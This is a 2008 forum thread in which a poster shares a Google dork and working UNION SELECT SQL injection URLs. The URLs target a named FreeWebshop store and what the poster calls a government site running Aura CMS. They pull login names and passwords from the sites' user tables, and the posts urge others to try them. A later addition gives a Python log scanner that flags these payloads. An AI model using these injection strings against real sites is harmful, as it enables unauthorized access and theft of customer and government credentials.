FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit


Post by juniorsev3n on Thu Feb 21, 2008 4:17 pm

google dork: "Powered by FreeWebshop.org 2.2.1"
example website: http://www.atelierinderoos.nl/
bug: index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

====
so
http://www.atelierinderoos.nl/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

===
full details at
http://milw0rm.com/exploits/4740

sorry, it's an old bug, but this blind SQL injection is a nice one
===
have fun trying it

Re: FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Post by juniorsev3n on Thu Feb 21, 2008 4:52 pm

oh man
aura cms
got one

http://www.banjar-jabar.go.id/redesign/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*

that's a government site, isn't it?
what should we do with it?
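Both request URLs in this thread put `UNION SELECT` into a query parameter and replace the spaces with SQL comments (`/**/`) or `+`. As an added example (not part of the original posts), a Python check for web access logs that normalizes both forms and flags them; the log lines are constructed, and treating `cat`, `group` and `kid` as integer-only parameters is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the URLs in this thread; that they should only
# ever carry integers is an assumption of this example.
NUMERIC_PARAMS = {"cat", "group", "kid"}
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)   # closed or trailing open comment
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Replace comment-as-whitespace (/**/) with spaces and collapse whitespace."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value)).strip()

def inspect_request(path):
    """Return (param, reason) findings for one request path."""
    findings = []
    # parse_qsl already decodes %xx escapes and turns '+' into a space.
    for name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if UNION_SELECT.search(normalize(raw)):
            findings.append((name, "union-select"))
        elif name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", raw):
            findings.append((name, "non-numeric"))
    return findings

def scan(lines):
    """Return {line_number: findings} for log lines with at least one finding."""
    hits = {}
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and (found := inspect_request(m.group(1))):
            hits[n] = found
    return hits

# Constructed access-log lines (documentation IP ranges, simplified payloads).
SAMPLE_LOG = """
192.0.2.10 - - [21/Feb/2008:16:17:00 +0700] "GET /index.php?page=browse&action=list&group=0&cat=3&orderby=DESCRIPTION HTTP/1.1" 200 5120
198.51.100.7 - - [21/Feb/2008:16:18:12 +0700] "GET /index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,null,null/*&orderby=DESCRIPTION HTTP/1.1" 200 4800
198.51.100.7 - - [21/Feb/2008:16:52:40 +0700] "GET /index.php?pilih=links&aksi=lihat&kategori=&kid=-999'union+select+0,0,0%20from%20user+limit+0,1/* HTTP/1.1" 200 3900
192.0.2.44 - - [21/Feb/2008:17:01:05 +0700] "GET /index.php?page=browse&cat=abc HTTP/1.1" 200 2100
""".strip().splitlines()

if __name__ == "__main__":
    for line_no, found in scan(SAMPLE_LOG).items():
        print(line_no, found)
```

A hit on a log line means the request should be reviewed; the fix on the application side is to cast such parameters to integers or bind them in prepared statements.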
